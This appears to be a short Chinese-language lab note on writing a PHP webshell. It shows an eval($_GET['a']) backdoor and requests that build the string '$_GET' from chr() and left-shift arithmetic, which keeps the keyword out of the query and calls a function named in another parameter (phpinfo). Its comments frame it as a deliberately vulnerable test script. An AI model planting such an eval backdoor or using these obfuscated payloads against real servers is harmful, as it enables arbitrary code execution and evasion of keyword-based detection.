左移运算符

<<

写shell

构造$_GET(用 chr() 配合左移运算逐个算出字符,再拼接成字符串 "$_GET")

后台代码

<?php
// Test harness for the requests listed on this page (appears to be a
// deliberately vulnerable lab script; it has no legitimate production use).
//
// SECURITY: eval() executes the raw `a` query parameter as PHP source, so any
// client that can reach this script gets arbitrary code execution with the
// privileges of the PHP process. Nothing here validates or restricts the input.
// NOTE(review): the sample requests on this page assemble the string "$_GET"
// from chr() and shift arithmetic, so the literal never appears in the request;
// reviews and detections should key on the eval()-of-request-data sink itself
// rather than on keyword matches in the query string.
eval($_GET['a']);
// $s is never assigned in this file; it only has a value if the evaluated code
// sets it. Otherwise PHP reports an undefined variable and dumps NULL.
var_dump($s);

测试

?a=var_dump(chr((12<<3)-1)); ==>_
?a=var_dump(chr((9<<3)-1)); ==>G
?a=var_dump(chr((9<<3)-3)); ==>E
?a=var_dump(chr(21<<2)); ==>T
?a=var_dump((chr(9<<2)).(chr((12<<3)-1)).(chr((9<<3)-1)).(chr((9<<3)-3)).(chr(21<<2)));
==>$_GET

?a=${chr((12<<3)-1).(chr((9<<3)-1)).(chr((9<<3)-3)).(chr(21<<2))}[_]();&_=phpinfo